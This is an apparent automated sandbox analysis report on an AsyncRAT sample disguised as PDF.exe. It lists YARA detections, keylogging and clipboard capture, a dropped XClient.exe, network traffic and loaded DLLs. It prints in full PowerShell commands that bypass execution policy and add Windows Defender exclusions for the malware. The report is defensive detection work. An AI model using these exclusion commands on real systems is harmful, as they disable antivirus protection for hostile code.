                                    Source: unknownNetwork traffic detected: HTTP traffic on port 64986 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64986
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64986 version: TLS 1.2

                                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                                    barindex
                                    Contains functionality to log keystrokes (.Net Source)
                                    Source: PDF.exe, XLogger.cs.Net Code: KeyboardLayout
                                    Source: XClient.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout
                                    Source: 0.2.PDF.exe.128e1a78.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                                    Source: C:\Users\user\Desktop\PDF.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                                    Operating System Destruction

                                    barindex
                                    Protects its processes via BreakOnTermination flag
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: 01 00 00 00 Jump to behavior

                                    System Summary

                                    barindex
                                    Malicious sample detected (through community Yara rule)
                                    Source: PDF.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 0.0.PDF.exe.640000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 0.2.PDF.exe.128e1a78.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 0.2.PDF.exe.128e1a78.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 00000000.00000000.1639412342.0000000000642000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 00000000.00000002.2928719557.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: C:\Users\user\Desktop\PDF.exeCode function: 0_2_00007FFD9B7C1BB10_2_00007FFD9B7C1BB1
                                    Source: C:\Users\user\Desktop\PDF.exeCode function: 0_2_00007FFD9B7C66920_2_00007FFD9B7C6692
                                    Source: C:\Users\user\Desktop\PDF.exeCode function: 0_2_00007FFD9B7C58E60_2_00007FFD9B7C58E6
                                    Source: PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: PDF.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 0.0.PDF.exe.640000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 0.2.PDF.exe.128e1a78.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 0.2.PDF.exe.128e1a78.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 00000000.00000000.1639412342.0000000000642000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 00000000.00000002.2928719557.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: PDF.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: PDF.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: PDF.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: XClient.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: XClient.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: XClient.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: 0.2.PDF.exe.128e1a78.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: 0.2.PDF.exe.128e1a78.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: 0.2.PDF.exe.128e1a78.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: XClient.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                    Source: XClient.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                    Source: 0.2.PDF.exe.128e1a78.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                    Source: 0.2.PDF.exe.128e1a78.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                    Source: PDF.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                    Source: PDF.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/20@3/3
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1772:120:WilError_03
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
                                    Source: C:\Users\user\Desktop\PDF.exeMutant created: \Sessions\1\BaseNamedObjects\GcZrYKQ4KFqNRE2E
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
                                    Source: C:\Users\user\Desktop\PDF.exeFile created: C:\Users\user\AppData\Local\Temp\XClient.exeJump to behavior
                                    Source: PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: PDF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    Source: C:\Users\user\Desktop\PDF.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: PDF.exeReversingLabs: Detection: 86%
                                    Source: PDF.exeVirustotal: Detection: 81%
                                    Source: C:\Users\user\Desktop\PDF.exeFile read: C:\Users\user\Desktop\PDF.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\PDF.exe "C:\Users\user\Desktop\PDF.exe"
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PDF.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PDF.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: avicap32.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: msvfw32.dllJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
